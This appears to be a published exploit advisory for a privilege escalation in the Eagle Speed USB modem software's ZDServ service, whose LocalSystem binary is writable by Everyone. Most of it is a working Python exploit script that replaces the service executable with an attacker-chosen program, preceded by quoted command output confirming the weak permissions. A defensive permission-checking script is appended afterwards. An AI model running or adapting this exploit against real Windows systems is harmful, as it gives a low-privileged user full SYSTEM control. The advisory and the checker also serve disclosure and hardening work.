Eagle Speed USB Modem Software Privilege Escalation
Source: https://infogen.al Author: R-73eN Published: 2016-11-29

#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed, a service named ZDServ is installed with it.
# The service itself has the right permissions, which do not allow reconfiguring the binary,
# but the path of the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
#        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
#        START_TYPE         : 2   AUTO_START
#        ERROR_CONTROL      : 1   NORMAL
#        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
#        LOAD_ORDER_GROUP   :
#        TAG                : 0
#        DISPLAY_NAME       : ZDServ
#        DEPENDENCIES       :
#        SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
#                                           NT AUTHORITY\SYSTEM:(I)(F)
#                                           BUILTIN\Administrators:(I)(F)
#                                          Victim-PC\lowpriv:(I)(F)
#                                           BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#

import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner


if(len(sys.argv) < 2):
    print '\n Usage : exploit.py program.exe\n'
    print 'https://infogen.al/'
else:
    program = sys.argv[1]
    if(not os.path.isfile(program)):
        print "[-] The parameter was incorrect, use a correct filename [-]"
        exit(0)
    if(not os.path.isfile(path)):
        print "[-] File not found, probably the service doesn't exist [-]\n"
    else:
        print "[+] Backing up the binary [+]"
        os.system(file_move)
        print "[+] Copying the payload [+]"
        os.system("copy " + program + " " + path)
        if(filecmp.cmp(program,path)):
            print "[+] Exploit successful, wait for service to restart or reboot [+]"
        else:
            print "[-] Exploit failed [-]"
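
The check a defender would run for this class of bug, as an added example that is not part of the original advisory or the author's code: it reads `sc qc` and `icacls` output of the kind quoted above and lists the non-administrative principals that can alter the service binary. The function names, the trusted-principal list and the sample text are assumptions made for this illustration (Python 3).

```python
import re

# Principals expected to hold write access to a service binary.
TRUSTED = {"nt authority\\system", "builtin\\administrators",
           "nt service\\trustedinstaller"}
# icacls right codes that allow modifying, replacing or re-ACLing the file.
WRITE_CODES = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "DE", "WDAC", "WO"}
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)")

def service_binary(sc_qc_output):
    """Return the executable path from the BINARY_PATH_NAME line of `sc qc`."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_qc_output)
    if not m:
        return None
    value = m.group(1).strip()
    # A quoted path may be followed by arguments; keep only the quoted part.
    return value[1:].split('"', 1)[0] if value.startswith('"') else value

def untrusted_writers(icacls_output, path):
    """List (principal, rights) ACEs letting a non-admin principal alter `path`."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first ACE line carries the path
        m = ACE_RE.match(line)
        if not m:
            continue  # blank or summary line
        principal, groups = m.group(1), re.findall(r"\(([^)]*)\)", m.group(2))
        if "DENY" in groups or principal.lower() in TRUSTED:
            continue
        for rights in groups:
            if WRITE_CODES & set(rights.split(",")):
                findings.append((principal, rights))
    return findings

# Constructed sample input, modelled on the command output quoted above.
SC_QC = r'''SERVICE_NAME: zdserv
        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
        SERVICE_START_NAME : LocalSystem'''
ICACLS = r'''C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    Victim-PC\lowpriv:(I)(F)
    BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files'''

if __name__ == "__main__":
    for who, rights in untrusted_writers(ICACLS, service_binary(SC_QC)):
        print("%s has (%s) on the service binary" % (who, rights))
```

An empty result is the hardened state: only SYSTEM and Administrators hold write-capable rights on a binary that a LocalSystem service executes.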
   


 